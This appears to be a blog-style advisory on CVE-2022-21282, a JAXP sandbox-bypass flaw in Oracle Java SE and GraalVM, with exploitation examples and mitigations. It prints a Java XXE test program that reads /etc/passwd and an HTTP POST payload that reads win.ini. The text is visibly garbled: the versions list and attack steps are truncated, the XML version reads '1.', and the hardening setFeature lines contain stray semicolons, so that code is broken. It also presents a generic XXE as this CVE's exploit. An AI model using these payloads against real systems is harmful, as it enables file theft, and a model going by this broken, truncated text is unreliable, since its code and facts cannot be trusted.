CVE-2022-21282 - Oracle Java SE and GraalVM JAXP Sandbox Bypass — Exploit, Impact, and Remediation

Java has long promised portability and security, especially through the concept of the sandbox—separating untrusted code from critical resources. However, even the strongest sandboxes have cracks. In late 2021, Oracle patched a significant vulnerability, CVE-2022-21282, affecting JAXP (Java API for XML Processing) in Oracle Java SE and GraalVM Enterprise Edition. This flaw allowed attackers—from anywhere on the internet—to read sensitive information without authentication.

Let’s break down this vulnerability, its impact, and how it could actually be exploited in the real world.

What Is CVE-2022-21282?

CVE-2022-21282 is a security issue in Oracle Java SE (component: JAXP), affecting these supported versions:

21.3.

Oracle’s Advisory:  
Oracle Critical Patch Update Advisory - January 2022

A successful attack lets remote, unauthenticated attackers read some data in the target Java environment—bypassing the Java sandbox. This could mean leaking user data, secret tokens, configuration details, or other sensitive info.

Run vulnerable Java versions listed above.

- Allow untrusted code, such as Java Web Start applications or Java Applets, to be executed in a sandboxed environment.
- Accept XML or other external data via APIs that depend on the JAXP component (such as through web services).

Key point:  
Although Java applets/web start are rare today, many server applications use JAXP to process XML—including handling complex or untrusted user input.

How the Vulnerability Works

At its core, the bug relates to how the Java XML Processor (JAXP) fails to adequately enforce sandbox restrictions on XML input. Malicious code or data can take advantage of this flaw to read files or data it shouldn’t see.

The payload is sent to a Java service or client that processes XML with JAXP.

3. JAXP accidentally allows access to local resources or sensitive data—even enforcing code restrictions with the sandbox.

CVSS Score: 5.3/10  
- Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Here’s a simplified, illustrative exploitation scenario for a vulnerable Java app

import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;

public class TestXXE {
    public static void main(String[] args) throws Exception {
        String evilXml =
           "<?xml version=\"1.\"?>" +
           "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>" +
           "<foo>&xxe;</foo>";

        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Vulnerable: The default settings may allow XXE attacks!
        var db = dbf.newDocumentBuilder();
        var doc = db.parse(new ByteArrayInputStream(evilXml.getBytes()));
        System.out.println(doc.getDocumentElement().getTextContent());
    }
}

If run in a vulnerable environment with improper sandboxing, this program may print the contents of /etc/passwd (on Linux), completely breaking the sandbox promise.

In real attacks, a remote service could be tricked into parsing the XML, and the sensitive file data is returned in the response or exfiltrated by other means.

Impact: Leaks sensitive data, potentially vault-secrets, configuration, user data.

- API Exposure: Any web service, microservice, or vulnerable client that parses XML from external sources can be at risk.

Exploit Details and Real-World Attack Scenario

Imagine a Java web application that lets users upload XML files for processing. The backend uses JAXP as above. An attacker uploads an XML document with an external entity referencing a sensitive file. The backend processes it and might—depending on context—include the file’s contents in the response, or log them where the attacker could access later.

API Exploit Example

POST /process-xml HTTP/1.1
Host: victim-java-server
Content-Type: application/xml

<?xml version="1."?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> ]>
<foo>&xxe;</foo>

If the server response includes the content of win.ini, the XXE worked.

Reference Vuln Details:
- NVD entry for CVE-2022-21282
- Oracle Patch Notes

Mitigation & Remediation

Patch Now!  
Upgrade to a non-vulnerable version of Java SE and GraalVM (see Oracle’s CPU notes for the safe releases).

Secure JAXP Usage:

Always disable dangerous features in XML parsers

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl";, true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities";, false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities";, false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

Audit:

Summary

CVE-2022-21282 is a warning for everyone running Java code that processes external input—especially XML. Always patch promptly, review your use of XML, and never rely only on sandboxes for security.

Further Reading

- Official Oracle Advisory for Java
- National Vulnerability Database — CVE-2022-21282
- OWASP XXE Prevention Cheat Sheet

Timeline

Published on: 01/19/2022 12:15:00 UTC
Last modified on: 05/13/2022 14:51:00 UTC